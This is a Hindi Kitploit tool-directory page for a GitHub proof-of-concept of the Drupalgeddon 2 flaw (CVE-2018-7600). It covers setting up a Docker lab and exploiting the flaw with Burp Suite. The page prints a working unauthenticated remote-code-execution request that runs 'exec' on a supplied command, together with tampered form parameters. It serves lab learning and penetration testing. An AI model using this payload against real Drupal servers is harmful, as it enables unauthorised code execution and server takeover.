Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
drupal-cve-2018-7600-poc — प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2018-7600 (Drupalgeddon 2) के लिए, डॉकर और बर्प सूट का उपयोग करते हुए चरण-दर-चरण प्रयोगशाला वातावरण सेटअप और शोषण वॉकथ्रू के साथ। | Kitploit
उपकरण/GitHubGitHub/dowonkwon/drupal-cve-2018-7600-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubdowonkwon/drupal-cve-2018-7600-poc

drupal-cve-2018-7600-poc

प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2018-7600 (Drupalgeddon 2) के लिए, डॉकर और बर्प सूट का उपयोग करते हुए चरण-दर-चरण प्रयोगशाला वातावरण सेटअप और शोषण वॉकथ्रू के साथ।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

README

Drupal Drupalgeddon 2 अप्रमाणित दूरस्थ कोड निष्पादन (CVE-2018-7600)


Drupal 7.58 और उससे पहले के संस्करण, 8.3.9 से पहले के 8.x संस्करण, 8.4.6 से पहले के 8.4.x संस्करण, और 8.5.1 से पहले के 8.5.x संस्करण, फॉर्म API सहित डिफ़ॉल्ट या सामान्य मॉड्यूल कॉन्फ़िगरेशन का उपयोग करने वाले कई उप-प्रणालियों को प्रभावित करने वाली एक समस्या के कारण दूरस्थ हमलावरों को मनमाना कोड निष्पादित करने की अनुमति देते हैं।

संदर्भ:

  • https://www.drupal.org/sa-core-2018-002
  • https://research.checkpoint.com/uncovering-drupalgeddon-2/

असुरक्षित वातावरण


image.png

सबसे पहले, जैसा कि निम्न स्क्रीन में दिखाया गया है, संबंधित vulhub सामग्री को फोर्क करें।

image.png

फिर उस फ़ोल्डर को ZIP फ़ाइल के रूप में डाउनलोड करें और लाएँ।

image.png

drupal (CVE-2018-7600) से संबंधित सामग्री को निकालें और अपने रिपॉजिटरी में अपलोड करें।

image.png

अब उस रिपॉजिटरी के माध्यम से डॉकर में उस वातावरण को कॉन्फ़िगर करें।

image.png

जैसा कि नीचे दिखाया गया है, अपने रिपॉजिटरी को git clone कमांड से क्लोन करें और cd कमांड से उस फ़ोल्डर में जाएँ जहाँ docker-compose.yml फ़ाइल मौजूद है।

फिर निम्नलिखित कमांड से डॉकर को बैकग्राउंड में चलाएँ:

root@kitploit:~
docker-compose up -d

यह देखा जा सकता है कि यह इस प्रकार चल रहा है।

image.png

http://localhost:8080 पते पर जाएँ और Drupal होमपेज पर पहुँचें।

image.png

जैसा कि नीचे दिखाया गया है, Drupal वातावरण कॉन्फ़िगरेशन स्क्रीन दिखाई देती है और Drupal होमपेज स्क्रीन प्रदर्शित होती है।

एक्सप्लॉइट करने के लिए, इसे निम्नानुसार सरलता से सेट करें।

image.png

फिर यह इस प्रकार लोड होता है।

image.png

फिर अतिरिक्त साइट सेटिंग्स दर्ज करें (एक्सप्लॉइट के लिए त्वरित सेटअप हेतु test सेट करें)।

image.png

image.png

image.png

अंततः, Drupal साइट सेटअप इस प्रकार पूरा हुआ।

image.png

एक्सप्लॉइट


a2u/CVE-2018-7600 को संदर्भित करके, drupal को निम्नलिखित अनुरोध भेजा जा सकता है।

root@kitploit:~
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

CVE-2018-7600 (Drupalgeddon2) /user/register के माध्यम से AJAX का उपयोग करके फॉर्म फ़ील्ड में हेरफेर करने वाला एक अप्रमाणित हमला है, इसलिए Burp Suite के माध्यम से पैकेट को संशोधित किया जा सकता है।

सबसे पहले, Burp Suite के प्रॉक्सी साइट के माध्यम से "साइन अप" पर जाएँ, कोई भी मान दर्ज करें, और फिर पैकेट कैप्चर करें।

image.png

Burp Suite का उपयोग करके उस पैकेट में हेरफेर करें।

image.png

उस पैकेट को Repeater पर भेजें और सबसे नीचे निम्नलिखित कोड जोड़ें।

root@kitploit:~
element_parents = timezone/timezone/#value
ajax_form = 1
_wrapper_format = drupal_ajax
timezone[timezone] = id

फिर Send भेजने पर, यह देखा जा सकता है कि OK कमांड प्रदर्शित होता है।

image.png

वास्तव में अधिक दुर्भावनापूर्ण अनुरोध करने के लिए, CVE-2018-7600 (Drupalgeddon2) हमले को Drupal स्थापना के तुरंत बाद (Drupal स्थापना विज़ार्ड समाप्त होने से पहले) भेजना अधिक निश्चित है।

टूल डाउनलोड करें